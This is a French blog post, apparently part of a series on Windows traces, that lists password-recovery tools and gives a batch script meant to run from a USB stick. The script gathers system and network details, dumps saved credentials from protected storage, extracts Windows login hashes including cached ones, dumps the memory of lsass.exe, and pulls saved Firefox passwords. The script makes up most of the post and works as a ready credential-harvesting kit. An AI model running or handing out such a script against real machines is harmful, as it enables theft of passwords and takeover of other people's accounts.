Après le premier article consacré aux traces laissées dans Windows, la logique voulait que je parle des outils qui permettent de récupérer ces informations, en particulier les mots de passe.

La plupart des outils cités dans ce billet sont utilisables en ligne de commande, ce qui permet donc de les exécuter avec un simple shell (Dos). L'exception concerne Cain, qui aux dernières nouvelles supporterait tellement de fonctionnalités qu'il en devient incontournable.



Une fois ces outils téléchargés, que faire me dira-t-on? Eh bien imaginez une clé USB, avec tous les softs dessus. Le script suivant permet de récolter pas mal d'infos:

## General infos gathering: "set" et "ver" affichent les caractéristiques du système, ipconfig celles du réseau et mountvol les lecteurs
ver > infos.txt
set >> infos.txt
ipconfig /ALL >> infos.txt
mountvol >> infos.txt

## Credentials extraction: ces outils affichent le contenu du protected storage, à savoir les mots de passe enregistrés
pstoreview.exe > log1.txt
creddump.exe > log2.txt

## Hashes dump (cache as well): ces outils tentent d'extraire les hashes Windows, correspondant aux mot de passe de login, même ceux en cache (voir l'article précédent)
pwdump.exe localhost > log3.txt
fgdump.exe -r -k

## Lsass dump: ici, on dump la mémoire d'un processus en cours d'execution - lsass.exe qui contient lui aussi les hashes. Cette procédure est appliquable à d'autres processus.
pmdump.exe -list > plist.txt
type plist.txt | findstr lsass > tmp.txt
FOR /f %%a in (tmp.txt) do set pid=%%a
pmdump.exe %pid% lsass.dump
DEL tmp.txt

## Additional: extrait les mots de passe de firefox. Voir l'article
dumpAutoComplete.exe > firefox.txt


A suivre.